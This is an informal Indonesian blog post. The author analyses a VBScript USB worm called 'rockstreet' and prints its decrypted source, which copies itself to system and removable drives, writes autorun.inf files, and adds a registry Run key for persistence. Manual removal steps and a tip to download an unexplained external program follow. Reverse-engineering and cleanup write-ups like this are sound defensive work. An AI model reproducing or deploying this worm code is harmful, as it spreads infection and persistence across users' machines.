mungkin dah lama juga gwe kena ni virus. awalnnya gak ngeh juga, soalnya pake win bajaken :p. kalo di perhatiin di bagian judul internet explorer akan tampak tulisan semacam "[--Hacked By ROCKSTREET--] @InF ". tapi ternyata setelah googling gak ketemu tuh, di scan anti virus juga gak di indikasi sebagai virus. jadi ane ngoprek deh tuh virus. setelah di un-enkripsi kira2 begini lah isinya
'<---------[ awal contoh kode yang akan di encrypt ]------------>
'//Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus//
on error resume next
'//Nama dari virus
Rem 300808, \rockstreet was here.!
'//Memvariabelkan kata-kata berikut ini//
Dim src, winpath, flashdrive, fs, mf, atr, tf, rg, nt, check, sd
'//Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information//
atr = @[autorun]@&vbcrlf&@shellexecute=wscript.exe rockstreet.dll.vbs@
Set fs = CreateObject(@Scripting.FileSystemObject@)
Set mf = fs.getfile(Wscript.ScriptFullname)
Dim text, size
size = mf.size
check = mf.drive.drivetype
Set text = mf.openastextstream(1, -2)
Do While Not text.atendofstream
src=src&text.readline
src = src & vbCrLf
Loop Do
'//Copy diri untuk menjadi file induk di Windows Path
Set winpath = fs.getspecialfolder(0)
Set tf = fs.getfile(winpath & @\rockstreet.dll.vbs@)
tf.Attributes = 32
Set tf = fs.createtextfile(winpath & @\rockstreet.dll.vbs@, 2, True)
tf.write src
tf.Close
Set tf = fs.getfile(winpath & @\rockstreet.dll.vbs@)
tf.Attributes = 39
'//Buat Autorun.inf untuk menjalankan virus otomatis setiap flash dish yang masuk//
For Each flashdrive In fs.drives
If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And flashdrive.Path <> @A:@ Then
Set tf = fs.getfile(flashdrive.Path & @\rockstreet.dll.vbs@)
tf.Attributes = 32
Set tf = fs.createtextfile(flashdrive.Path & @\rockstreet.dll.vbs@, 2, True)
tf.write src:
tf.Close
Set tf = fs.getfile(flashdrive.Path & @\rockstreet.dll.vbs@)
tf.Attributes = 39
Set tf = fs.getfile(flashdrive.Path & @\autorun.inf@)
tf.Attributes = 32
Set tf = fs.createtextfile(flashdrive.Path & @\autorun.inf@, 2, True)
tf.write atr
tf.Close
Set tf = fs.getfile(flashdrive.Path & @\autorun.inf@)
tf.Attributes = 39
End If
Next
'//Manipulasi Registry//
Set rg = CreateObject(@WScript.Shell@)
rg.regwrite @HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\load@,winpath & @\rockstreet.dll.vbs@
rg.regwrite @HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title@, @[--Hacked By ROCKSTREET--] @InF @
rg.regwrite @HKCR\vbsfile\DefaultIcon@, @shell32.dll,2@
'//jika di periksa maka program berhenti selama 20 detik//
If check <> 1 Then Wscript.sleep 200000
Loop While check <> 1
Set sd = CreateObject(@Wscript.shell@)
sd.run winpath & @\explorer.exe /e,/select, @ & Wscript.ScriptFullname
'<---------[ akhir contoh kode yang akan di encrypt ]------------>
nah... kalo udah gitu dah tau deh gimana cara nanggulanginya :D
mari kita mulai:
1. jalanin ms config dengan cara jalanin start-run. ketik msconfig. klik tab startup, cari yang namanya rockstreet. hilangkan centangannya. klik ok. kalau ditanya, jangan restart komputer dahulu!
2. buka regedit dengan cara jalanin start-run. ketik regedit. lalu cari file berikut
-@HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\load <-- delete file ini
-@HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title <-- delete file ini, ato kalo mau silahkan edit biar IE lo makin kece :D
3. pergi ke c:/windows cari file rockstreet.dll.vbs lalu delete
4. restart komputer
udah gitu ajah.
skarang tinggal bersih2in ajah. biasanya file rockstreet ini ada di root drive kita kayak di c:/ ato d:/. delete sekalian file autorun.inf nya.
oia tambahan, setiap masukin flashdisk jangan pernah! ingat jangan pernah! jangan pernah nyolokin flash disk lo ke pantat kucing.. gak ding bcanda :p.
biasanya kalo nyolokin hardisk kan akan ada autorunnya yang nyuruh kita untuk milih mau jalanin apa tuh, jalanin music player ato vidio player ato explore gitu kan... jangan pernah klik ok. klik cancel langsung! karena kalo lo klik ok kemungkinan virus2 didalem flashdisk lo bakalan langsung aktif. mungkin laen waktu gwe akan mengungkapkan gimana cara untuk mematikan autorun flashdisk itu.. sekian saja dulu deh
terima kasih
tenyata virusnya bersembunyi juga. cara yang paling ampuh? kunjungi www.webdav.net dan donlot programnya!
